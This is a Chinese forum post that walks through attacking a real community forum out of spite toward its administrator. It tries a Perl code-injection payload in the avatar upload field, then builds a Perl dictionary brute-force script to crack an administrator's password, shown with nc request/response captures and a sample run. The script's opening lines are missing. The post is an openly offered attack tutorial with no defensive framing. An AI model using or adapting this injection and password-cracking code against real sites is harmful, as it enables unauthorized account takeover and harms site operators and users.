朱永春 發表於 2008-10-8 19:38:11

黑客实战:一次简单脚本攻击实例

一、开篇

今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。



<br />

二、准备/分析

安全第一,先开个HTTP代理,打开社区的登陆页面,看到上面显示的URL是:http://www.****bbs.com/login.cgi

打开页面的源代码,找到登陆的关键几句:



&lt;form action=&quot;login.cgi&quot; method=&quot;post&quot;&gt;<br />

&lt;input type=&quot;hidden&quot; name=&quot;menu&quot; value=&quot;login&quot;&gt;<br />

&lt;input type=&quot;hidden&quot; name=&quot;id&quot; value=&quot;&quot;&gt;<br />

用户名:&lt;input size=&quot;25&quot; name=&quot;username&quot; class=&quot;i06&quot;&gt;<br />

密 码:&lt;input type=&quot;password&quot; size=&quot;25&quot; value name=&quot;userpsd&quot; class=&quot;i06&quot;&gt;<br />

&lt;/form&gt;

所以,提交登陆信息的URL应该是http://wwww.****bbs.com/login.cgi?username=ID&amp;userpsd=PWD&amp;menu=login&amp;id=

<br />

习惯先查看用户信息,因为一般情况下用户名和密码都是紧连着保存在一起的,在这里我们更容易接近我们想要的信息。提交如下URL查看silkroad用户信息:

http://www.****bbs.com/yhreg.cgi?menu=viewuser&amp;username=silkroad

返回正常用户信息

<br />

http://www.****bbs.com/yhreg.cgi?menu=viewuser&amp;username=./silkroad

同样返回正常用户信息,看来.和/已经被过滤掉了

<br />

http://www.****bbs.com/yhreg.cgi?menu=viewuser&amp;username=silkroad

提示此用户没有被注册 :(

<br />

扫描看看,有FTP弱口令~可惜是anonymous,价值不大。

<br />

回到CGI上,只在http://www.****bbs.com/rank.cgi这上面发现用的是Yuzi的BBS3000。下面也可以下载BBS3000分析源代码,但比较费时间,我们先到几处敏感的地方看看,

http://www.****bbs.com/photo.cgi可以上传头像。

由于头像的显示是



&lt;img src=***&gt;&lt;/img&gt;

关键就在***这里,即图片的连接。在要上传的头像的输入栏中填入



<br />

&lt;/img&gt;qq~;open F,&quot;&gt;the0crat.txt&quot;;&lt;img src=&gt;.gif

试试,提交,没有任何提示,程序也没对图片进行任何改变。

<br />

换个角度来看,既不分析源代码,也不入侵目标服务器,那么还是来试试探测探测社区管理员的密码,难说我今天运气比较好 :)

当然社区上的管理员也不会是白痴,不会设个空密码等你去玩。提到探测论坛ID的密码,大家首先想到的是什么?下载个又大又没趣的黑客软件来挂个字典?难道就没有点想要自己动手写一个脚本来破密码的冲动?嘿嘿。现在就教你自己动手一步一步来对密码进行探测 :)

<br />

密码探测的一般方法是:

①取得预进行猜测的密码列表

|

|

|

②向目标依次提交密码 &lt;---------

| |

| |

| |

③根据目标的响应判断密码是否正确 |

| | |

| | |

| | |

密码正确 密码错误 |

| | |

| | |

| | |

返回给用户密码 Next-----------------

<br />

第三步要绕个圈子,其他的几步用程序就能很简单的实现。

所以先从第三步开始:

我不了解别的那些程序是怎么进行判断的,估计是先取得成功登陆和密码错误的两个页面的代码,然后对比它们的不同点,可能还有别的办法,可我还没想到~~~:)   

所以,首先注册个ID,帐号asdfasdf,密码asdfasdf,根据前面取得的信息,此ID提交的URL为http://www.****bbs.com/login.cgi?username=asdfasdf&amp;userpsd=asdfasdf&amp;menu=login&amp;id=,&quot;username=&quot;这后面的是用户ID,&quot;userpsd=&quot;这后面是用户密码,然后登出社区

现在用telnet去取得我们想要的信息:



F:\&gt;nc -vv www.****bbs.com 80       &lt;&lt;&lt;-----用nc连接目标WEB服务的端口,别说你不知道nc是什么,嘿嘿<br />

Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA<br />

www.****bbs.com [***.***.***.***] 80 (http) open<br />

GET http://www.****bbs.com/login.cgi?username=asdfasdf&amp;userpsd=error&amp;menu=login&amp;id= HTTP/1.1 &lt;Enter&gt;   <br />

&lt;&lt;&lt;-------这里用到前面提到的提交用户登陆信息的URL,但用的是错误密码<br />

host:iis-server &lt;Enter&gt;&lt;Enter&gt;<br />

HTTP/1.1 200 OK<br />

Date: Mon, 18 Aug 2003 11:59:41 GMT<br />

Server: Apache/1.3.26 (Unix) PHP/4.0.6<br />

Transfer-Encoding: chunked<br />

Content-Type: text/html<br />

fe7               &lt;&lt;&lt;------------注意这个<br />

&lt;html&gt;<br />

&lt;head&gt;<br />

&lt;meta http-equiv=Content-Type content=text/html; charset=gb2312&gt;<br />

&lt;link REL=&quot;SHORTCUT ICON&quot; href=http://www.****bbs.com/pic/ybb.ico&gt;<br />

......

这个是非成功登陆后返回的信息,再来:



F:\&gt;nc -vv www.****bbs.com 80<br />

Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA<br />

www.****bbs.com [***.***.***.***] 80 (http) open<br />

GET http://www.****bbs.com/login.cgi?username=asdfasdf&amp;userpsd=asdfasdf&amp;menu=login&amp;id= HTTP/1.1   <br />

&lt;&lt;&lt;-------这次用的是正确的密码<br />

host:iis-server<br />

HTTP/1.1 200 OK<br />

Date: Mon, 18 Aug 2003 12:09:43 GMT<br />

Server: Apache/1.3.26 (Unix) PHP/4.0.6<br />

Transfer-Encoding: chunked<br />

Content-Type: text/html<br />

18d       &lt;&lt;&lt;------------注意这个<br />

&lt;html&gt;&lt;head&gt;&lt;meta http-equiv=Content-Type content=text/html; charset=gb2312&gt;<br />

&lt;SCRIPT&gt;<br />

expireDate=new Date;<br />

expireDate.setYear(expireDate.getYear() 1);<br />

......

这个是成功登陆后返回的信息,返回的信息的第七行&quot;fe7&quot;和&quot;18d&quot;不同,我们就从这里下手。

<br />

现在到社区的管理团队上看看管理员的ID,其中一个管理员的ID是&ldquo;秘密&rdquo;。

<br />

三、程序代码/代码解析

思路(步骤):

取得IP ---&gt; 打开字典,字典里每一行一个密码 ---&gt; socket() ---&gt; connect() ---&gt; 向目标主机WEB端口提交数据,此数据中所提交的密码用一个变量来代替,这个变量就是字典里的密码 ---&gt; 将返回的信息保存,用先前提到的登陆成功/失败返回信息的不同点进行对比,判断是否登陆成功,即密码是否正确 ---&gt; [ 当前密码正确---&gt;输出正确的密码并退出程序; 当前密码错误---&gt;从第二步骤开始重复,直到密码正确或试完字典里的所有密码 ]   

#提交的信息<br />

my @res=sendraw($req);   #将目标服务器返回的信息保存为数组<br />

if($res=~/fe7/g) #从@res数组中取得所返回信息的第7行,并进行判断。<br />

判断依据:前文中用telnet所获知的用来判断密码是否正确的字符<br />

{print &quot;\npwd:$pwd error&quot;;}   #如果返回的信息中的第7行中包含fe7这三个<br />

字符,则在屏幕上打印出密码错误的信息<br />

else<br />

{<br />

print &quot;\npwd:$pwd passed&quot;;   #因为成功登陆后返回的信息中的第7行不包<br />

含fe7这三个字符,所以如果第7行中不包含fe7这三个字符就表示登陆成功,<br />

即密码正确<br />

close(FH);<br />

exit;   #探测到正确密码立刻退出<br />

}<br />

}   #对比判断是否登陆成功的循环<br />

close(FH);<br />

sub sendraw {<br />

my ($req2) = @_;<br />

my $target;<br />

$target = inet_aton($host) or die &quot;\ninet_aton problems&quot;;   #转换目标IP<br />

socket(Handle,PF_INET,SOCK_STREAM,getprotobyname(&rsquo;tcp&rsquo;)||0) or die &quot;\nSocket problems\n&quot;;   #Socket<br />

if(connect(Handle,pack &quot;SnA4x8&quot;,2,80,$target)){   #此例中为80端口,<br />

根据实际情况更改<br />

select(Handle);<br />

$| = 1;<br />

print $req2;   #向目标服务器提交登陆资料<br />

my @res2 = &lt;Handle&gt;;   #取得目标服务器返回的信息<br />

select(STDOUT);<br />

close(Handle);<br />

return @res2;   #将目标服务器返回的信息作为sendraw()函数的返回值<br />

}<br />

else {<br />

die(&quot;\nCan&rsquo;t connect to $host:80...\n&quot;);<br />

}<br />

}

<br />

四、演示



dic.dic内容如下:<br />

asdf<br />

asdfasdf<br />

asdfa<br />

运行这个脚本(win2k activeperl5.6下通过)<br />

C:\&gt;cracker.pl www.****bbs.com<br />

Sending...<br />

pwd:asdf error<br />

pwd:asdfasdf passed

程序探测到正确密码后退出...:)

<br />

注意要根据实际情况更改提交的信息和判断依据,以及WEB端口。

<br />

挂个字典,就可以慢慢等密码出来了,然而更多时候是取决于你的运气。

<br />

五、总结

弊:这段代码用的是单线程,所以在探测的速度上不是很理想,有兴趣的可以去改改,在没有使用跳板的情况下对自己不安全,而且成功率很大程度上取决于你的运气。

利:这种方法比较有效, 但也是比较没有效率的密码破解方式。





<br />
頁: [1]
查看完整版本: 黑客实战:一次简单脚本攻击实例